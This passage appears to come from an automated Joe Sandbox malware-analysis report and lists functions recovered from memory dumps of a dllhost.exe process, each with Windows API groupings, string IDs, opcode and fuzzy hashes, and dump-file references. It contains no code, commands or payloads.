                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction ID: 7c000c98f03e61e3344d8810428f79650fba638244d031ec4d25807f321fa2ef
                                                                                                                                  • Opcode Fuzzy Hash: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction Fuzzy Hash: 92F09061B0A70989EB108B24A8D83693331EFC9760F540F19DAE9466E4CF2CC448C300
                                                                                                                                  Function 00000290EDD055D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 3aea7139df32369f879ece52c3062891ec0d21dfbcfe470f159ab8e5a177004e
                                                                                                                                  • Instruction ID: 67ff97698d59bfeef0940e0b4f1a1cd640a6af7f2715dac83582c025870b86a1
                                                                                                                                  • Opcode Fuzzy Hash: 3aea7139df32369f879ece52c3062891ec0d21dfbcfe470f159ab8e5a177004e
                                                                                                                                  • Instruction Fuzzy Hash: 3A02C836A1DB888AEBA0CB55F49875AB7A1F7C4794F100515EACE87BA8DF7CD444CB00
                                                                                                                                  Function 00000290EDD05C10 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 0441838d824fc983c730246148d7a7fc38d6cc047019034bf9020db6d46abb4c
                                                                                                                                  • Instruction ID: 3128cabcfc80a8f8c0f9db07564f79d7678210d8e2538fb3322b9756668ddc60
                                                                                                                                  • Opcode Fuzzy Hash: 0441838d824fc983c730246148d7a7fc38d6cc047019034bf9020db6d46abb4c
                                                                                                                                  • Instruction Fuzzy Hash: 9961CB3691DB88CAE760CB15E89832AB7A1F7C8B44F500916EACE47BA4DB7CC540CF54
                                                                                                                                  Function 00000290EDD08A60 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: da18fd4b9950f5b75121c5a33d21014a98e50bf918f97c8248def4d0c313f58f
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 1B51FB31B1A6088EEB14DF15D4CCB6C77A3FB84B98F148911DAC54B748D7B9D851C704
                                                                                                                                  Function 00000290EDB09C6C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: a0209e6c2917d6bf570bf68edfe56ae2d0afa2c3adfe8ea93ae7a185e232dad6
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: C751B13A204688CEEF748F1294CC35A77A2FB54B94F584A15DBD98BBD5EB34C9A0C701
                                                                                                                                  Function 00000290EDD0A4BC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  • Opcode ID: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction ID: 1bb2060d4907e0793818cbbf92b7d09f9137da87213f9fc12284f070d1fa48db
                                                                                                                                  • Opcode Fuzzy Hash: 422e28baaeae7ac14bcee333ee3501689d432e8c3f34beb3876b8884b2d0f2c3
                                                                                                                                  • Instruction Fuzzy Hash: 7F619E32908BC889EB60CB15E4847DEB7A1FBC5B98F445A15EBD917B99DB7CC190CB00
                                                                                                                                  Function 00000290EDD0A86C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: f4bc01b7eb2ec319704e2879a499dc4cf4e87dd483b866ca5711639528f8f247
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 08518232A087888EEB748F11D5C839D77A2FBD4B94F186916DAD947BD5CB38C891CB01
                                                                                                                                  Function 00000290EDD03720 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  • Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction ID: e04fdfcdd1bee8a25ed55a54ec2859a73a57438903e16af4cceb35dc931996f0
                                                                                                                                  • Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction Fuzzy Hash: 8D118161B18B5995EB109B25E88835AB2B5FFC4780F800825EEC983A95EF78C959C300
                                                                                                                                  Function 00000290EDD11D68 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                  • Opcode ID: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction ID: a41519c935a66dc463951aabc709ac9defec7e57a128039227b0070d018143c5
                                                                                                                                  • Opcode Fuzzy Hash: 1e5131369e73c8b0b3a82c3b3899f962dfdd68d3e046a9ea647a68590475b17d
                                                                                                                                  • Instruction Fuzzy Hash: 52D1EF32B19A888DE710CFA9D5883EC3BB2FB54B98F444616DF9D97B99DA34C446C340
                                                                                                                                  Function 00000290EDD014A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168794593-0
                                                                                                                                  • Opcode ID: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction ID: a694efbe066c2adc16dd5d05fb04f1b5244d19d79408820d313e7d6eef202d20
                                                                                                                                  • Opcode Fuzzy Hash: c2c0360827517a06e8d0680bc42561039c20425810adeb3802ef81e067c22a51
                                                                                                                                  • Instruction Fuzzy Hash: E7014C72A15B94CAE705DF66E88824977B5FB89F80F094825DF8A53728DF38D491C740
                                                                                                                                  Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168794593-0
                                                                                                                                  • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                  • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                                                                                                                  • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                  • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                                                                                                                  Function 00000290EDD126B4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000290EDD1269F), ref: 00000290EDD127D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                  • Opcode ID: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction ID: 8e56a100005b7eda2bb6dd9dcaaf4a3bf166ac34099223d74f30425a52109219
                                                                                                                                  • Opcode Fuzzy Hash: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction Fuzzy Hash: 0A911432F1A6588DFB54CF699ACA3AD3FA0FB54B88F444906DE8A53B95CB36C445C300
                                                                                                                                  Function 00000290EDD07E50 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                  • Opcode ID: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction ID: 5b6c518ce8db2df1cc01d770f9e3db7385e0eb61b5694929e17bfe84decb91fb
                                                                                                                                  • Opcode Fuzzy Hash: f835b8e08e75b66adb0c80a9203c172f2f025c961cbdb54561531f30ab1cb5f4
                                                                                                                                  • Instruction Fuzzy Hash: 1D111226B55F098EFB00CF60E8993A833B4FB59758F441E25DEAD467A4DF78C1948340
                                                                                                                                  Function 00000290EDD024F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction ID: a9927fb8daf362b972858d7acf84ec743ac6e554b9719d5fcc2d5ad8e7a05159
                                                                                                                                  • Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction Fuzzy Hash: 3A71E436A097898EE735DF2699C83EA7BA6FBC5784F840825DDC947B99DE34C601C700
                                                                                                                                  Function 00000290EDD027D4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction ID: 86446507bfd2e62e954e9099b7f5f65a0b73635430e4073ae554b64bd5c455e4
                                                                                                                                  • Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction Fuzzy Hash: 0971F932A097895AE774DF2A9DCC3EA7B96FBC8794F400916DD8943B99DE34C605C700
                                                                                                                                  Function 00000290EDB07E60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: c4af10d05ca9d97ba8d3bc5267770c68993fd3a92605fbca60acb028580cf4b8
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: CE51D23A311648CEEB54DB15E098B6E7393FB44B88F108924EA894F788FBB9D941C700
                                                                                                                                  Function 00000290EDB098BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                  • Opcode ID: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction ID: 842348b470e78d3a06df6d2ae0b5046d4ad6df97fcb35b955ada422f71c5b44c
                                                                                                                                  • Opcode Fuzzy Hash: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction Fuzzy Hash: 86619036504BC8C9EB709B15E48479FB7A1FB85B98F084615EBD90BB99EB7CC190CB00
                                                                                                                                  Function 00000290EDD12420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction ID: 6a29b570ffc8498ab72912983577f1bafd4bd9531f70f3b82db2ae966cc92201
                                                                                                                                  • Opcode Fuzzy Hash: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction Fuzzy Hash: A8412B73B2AA888AE720CF65E4897D9B7A5F798784F804421EECD87758DB3DC401C740
                                                                                                                                  Function 00000290EDD08F38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
